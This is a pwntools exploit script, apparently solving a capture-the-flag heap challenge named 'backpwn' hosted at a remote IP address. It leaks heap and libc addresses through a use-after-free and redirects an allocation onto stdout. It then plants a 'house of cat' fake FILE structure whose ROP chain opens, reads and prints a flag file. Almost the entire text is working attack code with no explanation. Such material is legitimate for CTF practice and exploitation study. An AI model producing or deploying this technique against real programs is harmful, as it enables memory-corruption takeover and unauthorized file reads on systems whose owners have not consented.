1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166
| from pwn import *
context.arch = 'amd64' context.log_level = 'debug'
fn = './backpwn' elf = ELF(fn) libc = ELF('./libc.so.6')
debug = 1 if debug: p = process(fn) else: p = remote('60.204.140.184', 30276)
def dbg(s=''): if debug: gdb.attach(p, s) pause()
else: pass
lg = lambda x, y: log.success(f'{x}: {hex(y)}')
def house_of_cat(fake_IO_file_addr): flag_addr = fake_IO_file_addr + 0x200 data = fake_IO_file_addr + 0x400 payload = flat( { 0x20: [ 0, 0, 1, 1, fake_IO_file_addr+0x150, setcontext + 61 ], 0x58: 0, 0x78: _IO_stdfile_2_lock, 0x90: fake_IO_file_addr + 0x30, 0xb0: -1, 0xc8: _IO_wfile_jumps + 0x10, 0x100: fake_IO_file_addr + 0x40, 0x140: { 0xa0: [fake_IO_file_addr + 0x210, ret] }, 0x1f0: 'flag', 0x200: [ pop_rax_ret, 2, pop_rdi_ret, flag_addr, pop_rsi_ret, 0, syscall_ret,
pop_rax_ret, 0, pop_rdi_ret, 3, pop_rsi_ret, data, pop_rdx_rbx_ret, 0x40, 0, syscall_ret,
pop_rax_ret, 1, pop_rdi_ret, 1, pop_rsi_ret, data, pop_rdx_rbx_ret, 0x40, 0, syscall_ret ] }, filler='\x00' )
return payload
def add(size, content='aaaaaaaa'): p.sendlineafter('>>', '1') p.sendlineafter('size:', str(size)) p.sendafter('Content:', content)
def edit(idx, content): p.sendlineafter('>>', '3') p.sendlineafter('idx:', str(idx)) p.sendafter('Content:', content)
def show(idx): p.sendlineafter('>>', '4') p.sendlineafter('idx:', str(idx))
def delete(idx): p.sendlineafter('>>', '2') p.sendlineafter('idx:', str(idx))
add(0x500) add(0x500) add(0x500)
delete(1) delete(2)
edit(2, 'a')
show(2)
p.recvline() heapbase = u64(p.recvline()[:-1].ljust(8, b'\x00')) & ~0xffffff lg('heapbase', heapbase)
edit(2, p64(heapbase + 0x240))
add(0x500) add(0x500, 'a')
show(4)
mi_libc_base = u64(p.recvuntil('\x7f')[-6:].ljust(8, b'\x00')) - 0x22861 lg('mi_libc_base', mi_libc_base)
libc_base = mi_libc_base - 0x1f2000 lg('libc_base', libc_base)
_IO_2_1_stdout = libc_base + 0x1ed6a0 _IO_stdfile_2_lock = libc_base + 0x1ee7e0 _IO_wfile_jumps = libc_base + 0x1e8f60
pop_rdi_ret = libc_base + 0x0000000000023b6a pop_rsi_ret = libc_base + 0x000000000002601f pop_rdx_rbx_ret = libc_base + 0x000000000015f8c6 pop_rax_ret = libc_base + 0x0000000000036174 syscall_ret = libc_base + 0x00000000000630a9 ret = pop_rdi_ret + 1
setcontext = libc_base + libc.sym['setcontext']
deferred_free = mi_libc_base + 0x75f50
gadgets = [0xe3afe, 0xe3b01, 0xe3b04] one_gadget = libc_base + gadgets[1]
add(0x400) add(0x400) add(0x400)
delete(6) delete(7)
edit(7, p64(_IO_2_1_stdout))
add(0x400) add(0x400)
payload = p64(0) * 2 + house_of_cat(_IO_2_1_stdout) add(0x400, payload)
p.interactive()
|